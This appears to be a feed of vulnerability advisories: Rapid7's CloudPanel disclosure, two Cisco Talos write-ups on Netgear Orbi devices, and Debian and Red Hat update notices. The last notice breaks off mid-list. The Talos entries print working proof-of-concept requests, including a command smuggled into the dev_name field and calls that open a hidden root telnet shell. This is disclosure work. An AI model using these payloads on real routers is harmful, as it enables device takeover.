MGT-COMMERCE CloudPanel ships with a static SSL certificate to encrypt communications to the administrative interface, shared across every installation of CloudPanel. This behavior was observed in version 2.2.0. There has been no indication from the vendor this has been addressed in version 2.2.1.

_Last updated at Tue, 21 Mar 2023 19:08:25 GMT_

While using the popular self-hosted web administration solution, CloudPanel from MGT-COMMERCE, Rapid7 researcher Tod Beardsley discovered three security concerns. The first, an issue involving the trustworthiness of the installation script provided by the vendor, was an instance of CWE-494: Download of Code Without Integrity Check, and was quickly addressed by the vendor in under a day.

The second issue was with how the installer overwrites local firewall rules to be overly permissive during setup, and appears to be an instance of CWE-183: Permissive List of Allowed Inputs. The third issue is more long-term; CloudPanel installations all share the same SSL certificate private key. This appears to be an instance of CWE-321: Use of Hard-coded Cryptographic Key.

**Product Description**

MGT-COMMERCE's CloudPanel is a free solution designed to ease the burden of administering self-hosted Linux servers, and is featured prominently at cloud virtual hosting providers such as AWS, Azure, GCP, Digital Ocean, and many others. More about CloudPanel can be found at the vendor's website.

**Credit**

These issues were discovered and reported by Tod Beardsley, a security researcher at Rapid7, and is being disclosed in accordance with Rapid7's vulnerability disclosure policy.

**Exploitation**

While experimenting with some self-hosting solutions for personal use, Beardsley discovered three issues that appear to place new CloudPanel installations at risk of opportunistic attacks across the internet.

**Pipe Curl to Bash**

The first issue, an instance of CWE-494 involving the trustworthiness of the "curl to bash" installation procedure documented by the vendor was quickly addressed by publishing a cryptographically secure checksum of the installation script. The vendor's website now includes this check for a sha256 hash, as seen in the screenshot below.

This hash changes as new versions of the install script are released, of course, so it may be different by the time you read this advisory. A strategy of publishing a cryptographically secure hash and incorporating a check of that hash should alleviate any concern about the usual "pipe curl to bash" procedure for downloading and installing software over the internet. If you trust the vendor's website, and if the vendor's website is itself protected with an HTTPS certificate, then you should be confident that the installation script they provide is actually the installation script you expect to run. We urge other software providers to incorporate a similar hash check for distributing their installation scripts if they must distribute them via "pipe curl to bash" schemes.

**Firewall Rule Rewrite On Installation**

The instance of CWE-183 arises due to the fresh installation procedure recommended by the vendor in their documentation. During installation, the installation script preemptively discards local firewall rules for the host operating system, replacing them with much more permissive rules.

In the test case, the local firewall rules (as seen by ufw) are pre-set as:

    root@debian11:~# ufw status numbered
    Status: active
    
         To                         Action      From
         --                         ------      ----
    [ 1] Anywhere                   ALLOW IN    1.2.3.4               
    [ 2] 80:8443/tcp                DENY IN     Anywhere  
    

(Note, the allowed IP address has been replaced with "1.2.3.4")

The above rules state, "Allow any traffic from 1.2.3.4, deny all traffic to ports 80 through 8443 to everyone else." The ufw configuration also concludes with a general default deny rule (not seen here).

During installation, and upon completion of that one-command piping bash to curl installation procedure, these rules are changed to:

    root@debian11:~# ufw status verbose
    Status: active
    Logging: on (low)
    Default: deny (incoming), allow (outgoing), disabled (routed)
    New profiles: skip
    
    To                         Action      From
    --                         ------      ----
    22/tcp                     ALLOW IN    Anywhere                  
    80/tcp                     ALLOW IN    Anywhere                  
    443                        ALLOW IN    Anywhere                  
    8433:8443/tcp              ALLOW IN    Anywhere                  
    22/tcp (v6)                ALLOW IN    Anywhere (v6)             
    80/tcp (v6)                ALLOW IN    Anywhere (v6)             
    443 (v6)                   ALLOW IN    Anywhere (v6)             
    8433:8443/tcp (v6)         ALLOW IN    Anywhere (v6) 
    

These rules are, of course, far more permissive, specifically because they removed the deny rules as well as the custom IP address allow rule I had set prior to installation.

Furthermore, upon completion of the initial installation, the superuser administrator account for CloudPanel is blank. This is a problem because, typically, a user would navigate to the host server web panel and set the password to their chosen value. However, once installation is complete, and if the machine is on the routable internet (as is intended), an attacker could visit the same web panel and set the administration user account to their chosen password, thus effectively administrating the machine.

Note, the opportunity for attack is limited, since the legitimate CloudPanel administrator has the opportunity to reset firewall rules once installation is complete. However, when installation is complete, there is no notification that firewall rules have been discarded and replaced, so the legitimate user is left to discover this on their own.

If an attacker does manage to seize control during the vulnerable window of opportunity, they could install the malware of their choice, replace certificates, or otherwise alter the underlying operating system as an authenticated administrator, since the whole purpose of CloudPanel is to ease the task of OS management.

The trick for the attacker, then, is to find fresh installations of CloudPanel. This seems unlikely on the open internet assuming users are quick to set their superuser administrator account password, but issue CVE-2023-0391, described next, makes the job of finding these fresh CloudPanel servers much easier, in an automated way.

**CVE-2023-0391: Reused Certificates**

Upon installation, CloudPanel ships with a static SSL certificate to encrypt communications to the administrative interface. Because the SSL certificate is generated once by MGT-COMMERCE and shipped with every installation of CloudPanel, this state of affairs is exploitable for two outcomes.

First, because the SSL certificate has a unique but reused public key, searching for unmodified CloudPanel instances is trivial with modern network scanning techniques. All an attacker would need to do is target a given IP address space used by a targeted Virtual Private Server (VPS) provider, and continuously look for HTTPS services running on port 8443 (the default for this web administration portal) and certificates that match the public key fingerprint seen below:

Using these search parameters, an attacker can continuously search, in real time, for new instances of CloudPanel, and then exploit the CWE-183 issue described above. Of course, other techniques exist for identifying CloudPanel instances, but the reused certificate leads to a secondary, more serious problem.

Since the private key also ships with every installation of CloudPanel, and CloudPanel is freely available to anyone who cares to download it, the encryption provided by the HTTPS connection is not trustworthy. An attacker with the private key can easily decrypted captured traffic, either in real time through a privileged position on the network between the client and the server, or later with captured network traffic. In either case, sensitive information such as an administrator password and session tokens would be immediately available to the attacker.

According to Shodan, as of January 18, 2023, there are about 5,800 servers providing a certificate issued by 'cloudpanel.clp\`, the self-signed authority found on the shipping default certificate. These servers are found mostly in the United States and Germany (which is unsurprising given that the vendor is a German company), and mostly in DigitalOcean VPS environments. This figure is close to our own scanning with Project Sonar, which has spotted 6,785 running instances as of January 27, 2023.

**Impact**

By chaining together the firewall permissiveness and the reused certificate issues together, an attacker can target and exploit new CloudPanel instances as they are being deployed. It's important to note that CloudPanel is touted to be an easy to use interface for basic Linux administration, is targeted at relatively inexperienced users, and much of the documentation presumes an installation procedure live on the routable internet with a fresh VPS instance.

Furthermore, it would appear that CloudPanel is currently enjoying a burst of uptake among new Fediverse-aware users (this researcher included). While self-hosting is a perfectly innocent and often virtuous goal for distributing personal and professional content, it does come with some additional security responsibilities that are traditionally taken up by dedicated professional services.

Unfortunately, those dedicated professionals are absent in the DIY, roll-your-own kind of environment encouraged by Fediverse fans, and users are left to fend for themselves when it comes to secure software deployment. In light of this advisory, users interested in self-hosting solutions are urged to be aware of the special security considerations that come along with offering services on the general internet. In years past, this would go without saying, but the late 2022 turmoil around untrustworthy centralized services such as Twitter may be generating a new wave of inexperienced sysadmins on the internet, similar the the surge of general internet usage during the Eternal September of 1993.

**Remediation**

As of this publication, the firewall rewriting issue, the blank superuser password, and CVE-2023-0391 remain unfixed by the vendor. The issues described in the firewall rewrite issue could be fixed by the installation script taking a snapshot of the existing firewall rules, and programmatically creating a ruleset that incorporates the user's original intent with those rules. At the least, the script should identify, and warn the user, that firewall rules are about to be re-written.

The superuser administrator account should be created with a random, per-install password, and display that password on the console upon completion; once the user logs in for the first time, they could then be prompted to change the password.

Absent a patch for these issues, users should take care to install CloudPanel only on isolated networks in a way that is isolated beyond local firewall rules. Practically speaking, as long as the user is installing CloudPanel attentively, and watching for the moment the web service becomes available, attackers will only have a minute or so of exposure to take advantage of. Local, same-machine attackers aside, this should be good enough for most use cases.

For the second issue, the vendor could provide, as part of the installation script, a mechanism to create a unique self-signed SSL certificate during installation, and conclude the installation by printing the fingerprint on the console output.

Absent a patch for CVE-2023-0391, users of CloudPanel are encouraged to generate and install their own certificate for SSL use in order to avoid being so trivially fingerprintable by automated scans, and in order to ensure that the cryptographic security provided by HTTPS is actually secure against passive monitoring.

**Disclosure Timeline**

*   November, 2022: CWE-183 and CWE-494 issues discovered by Tod Beardsley of Rapid7
*   Wed, Nov 23, 2022: CWE-183 and CWE-494 reported to the vendor
*   Thu, Nov 24, 2022: Report acknowledged by the vendor, CWE-494 addressed
*   December, 2022: CVE-2023-0391 discovered
*   Wed, Jan 18, 2023: CVE-2023-0391 reported to the vendor
*   Tue, March 21, 2022: This public disclosure

CVE-2023-0391: CVE-2023-0391: MGT-COMMERCE CloudPanel Shared Certificate Vulnerability and Weak Installation Procedures

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

The access control functionality of the Orbi RBR750 allows a user to explicitly add devices (specified by MAC address and a hostname) to allow or block the specfied device when attempting to access the network. However, the dev_name parameter is vulnerable to command injection.

**Exploit Proof of Concept**

    POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
    Host: 10.0.0.1
    Content-Length: 104
    Authorization: Basic YWRtaW46UGFzc3cwcmQ=
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
    Connection: close
    
    action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list
    

On the device itself, we can see this command now being executed.

       root@RBR750:/tmp# ps | grep ping
       21763 root      1336 S    ping 10.0.0.4
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-37337: TALOS-2022-1596 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

Debian Linux Security Advisory 5376-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5376-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 20, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : apache2CVE ID         : CVE-2006-20001 CVE-2022-36760 CVE-2022-37436 CVE-2023-25690                 CVE-2023-27522Multiple vulnerabilities have been discovered in the Apache HTTP server,which may result in HTTP response splitting or denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 2.4.56-1~deb11u1.We recommend that you upgrade your apache2 packages.For the detailed security status of apache2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/apache2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQYqdQACgkQEMKTtsN8TjYWeQ//dwKUtLc9oKmjEmiY1QsRsSYdlzMTWA8ow63vdtGD1QU3Xb/CxPSZ22Oh8zypNP5qtk3m11JA7npd7RNPpF3Gb1V5ebIlKP7GavGBIrGOmvH31hV3IUP4HoXO/mC36BA3twAgyF12HMtdPvj+qaNguYnxXhc02Kt7kl6sq+ybtdCnRnBfJJ2KYXKqtjRedc+HJZa0gSuq9fsFbaQF1OPk1jHEO/ixHhISKhEr1mHO+eLN3soQ9gqaEG/a/0jLUm1ThiBNeK5jkmCXuIuqwwrGHG16Cl9fIKGps1Yb+ef2aJca7onA4IfyUj1d1S7VmCgFFQe+5eAgdcR77mWS8RyEP/lyItY+ifzGG6xR0EUnDgD7ApcqhZBIJCgU583Dle+sjvwgb9iSSeNwynqx58Pf4648AJSx6nNlsop4ekE4To5GvKyr/eI3HNqat9BfVtwqRu4GnnurvJFzh5n2wpRl1JbQMFMx/kxb1He5ioayRtru9guViNA3ylgnd7lbk8FEsvvzS9MM0RVivlWdzD6+FVFHaWoCcwzv+0dFD6iiG5MJMGUr0pElw+juAs6bnKCCoEHU4HK0rKHlVeB6E3Ch7yF+b6PvzZqCqcOE6RB5/I2Nu9S3L78cZWRUnKXf/WHf3Lw+DCB8QKWUBuo0WjkFjmEe/oUCWHGt/UbtXGbSM+E=Bi/w-----END PGP SIGNATURE-----

Debian Security Advisory 5376-1

Red Hat Security Advisory 2023-1337-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1337-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1337  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.9.0-3.el9_1.src.rpm

aarch64:  
firefox-102.9.0-3.el9_1.aarch64.rpm  
firefox-debuginfo-102.9.0-3.el9_1.aarch64.rpm  
firefox-debugsource-102.9.0-3.el9_1.aarch64.rpm  
firefox-x11-102.9.0-3.el9_1.aarch64.rpm

ppc64le:  
firefox-102.9.0-3.el9_1.ppc64le.rpm  
firefox-debuginfo-102.9.0-3.el9_1.ppc64le.rpm  
firefox-debugsource-102.9.0-3.el9_1.ppc64le.rpm  
firefox-x11-102.9.0-3.el9_1.ppc64le.rpm

s390x:  
firefox-102.9.0-3.el9_1.s390x.rpm  
firefox-debuginfo-102.9.0-3.el9_1.s390x.rpm  
firefox-debugsource-102.9.0-3.el9_1.s390x.rpm  
firefox-x11-102.9.0-3.el9_1.s390x.rpm

x86_64:  
firefox-102.9.0-3.el9_1.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el9_1.x86_64.rpm  
firefox-debugsource-102.9.0-3.el9_1.x86_64.rpm  
firefox-x11-102.9.0-3.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQiCLA/9EQIrsyYlouTIW0DsRrnx+P4mS8u7qXCm  
6blO6pgZSm2hzqqEw8+M8mGlq6oGrYdd9GhT2qOYr0V/y4qxHeI6mk+ebCrL3Jq1  
YlTTfd/mLR38y2n+dEXIghNSCQ2pK4oeZ9XEbQ/U05Atrd/v1YP3YBQavF3tpbxb  
yH4EXqiQfWlyHpEpIrpsG39kKtV6kN+vgm2uA0bwMgfe+bq7yIJLVWlMRwhU+414  
s8CpsXQksSgRQLJtrDdMZ/IIYgtfeb6VAful3XFCVDBmVQskuDVNhviJSoJg4tp9  
AXXdgF/dMbXn7F73j/Rvn0GVXaurryXI6GeHNVrJ1lU0KhRyp8nZbSlTz+Px6le0  
FJrEuks8//YWtR1rHTd7J2Ytef+oE0xj65WLF7sULwIgV4aDjykOUP09WQ4pmjUf  
QsWBPwfpYdTQCuT4qaA63ZXzOn1NJZs9IyUckaMxhZ8m0NI+m1a3O5zfE7xRiAN1  
/dp/Rbt6LVwc3SFxQl8QZ1ebqeg5I5fZKgLKL7w6+MWu6bgif3zd7/HqumH+CJv6  
cgMbG6ZpTOW/cXcXXJzQ18kKhlG5JZajTT3KobY5QSi//553bFD4LRfFuskRRBFK  
Ol2kQy/fzpeUfTCIolh6VJCjrZ07eiDXEIn4hETmUc/Lto3owz9vnYCaGZFKM1Rm  
VZtQOLxSsOk=GR6W  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1337-01

Red Hat Security Advisory 2023-1332-01 - Network Security Services is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: nss security update  
Advisory ID:       RHSA-2023:1332-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1332  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-0767  
====================================================================  
1. Summary:

An update for nss is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Network Security Services (NSS) is a set of libraries designed to support  
the cross-platform development of security-enabled client and server  
applications.

Security Fix(es):

* nss: Arbitrary memory write via PKCS 12 (CVE-2023-0767)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, applications using NSS (for example, Firefox)  
must be restarted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170377 - CVE-2023-0767 nss: Arbitrary memory write via PKCS 12

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

ppc64:  
nss-3.79.0-5.el7_9.ppc.rpm  
nss-3.79.0-5.el7_9.ppc64.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc64.rpm  
nss-devel-3.79.0-5.el7_9.ppc.rpm  
nss-devel-3.79.0-5.el7_9.ppc64.rpm  
nss-sysinit-3.79.0-5.el7_9.ppc64.rpm  
nss-tools-3.79.0-5.el7_9.ppc64.rpm

ppc64le:  
nss-3.79.0-5.el7_9.ppc64le.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc64le.rpm  
nss-devel-3.79.0-5.el7_9.ppc64le.rpm  
nss-sysinit-3.79.0-5.el7_9.ppc64le.rpm  
nss-tools-3.79.0-5.el7_9.ppc64le.rpm

s390x:  
nss-3.79.0-5.el7_9.s390.rpm  
nss-3.79.0-5.el7_9.s390x.rpm  
nss-debuginfo-3.79.0-5.el7_9.s390.rpm  
nss-debuginfo-3.79.0-5.el7_9.s390x.rpm  
nss-devel-3.79.0-5.el7_9.s390.rpm  
nss-devel-3.79.0-5.el7_9.s390x.rpm  
nss-sysinit-3.79.0-5.el7_9.s390x.rpm  
nss-tools-3.79.0-5.el7_9.s390x.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
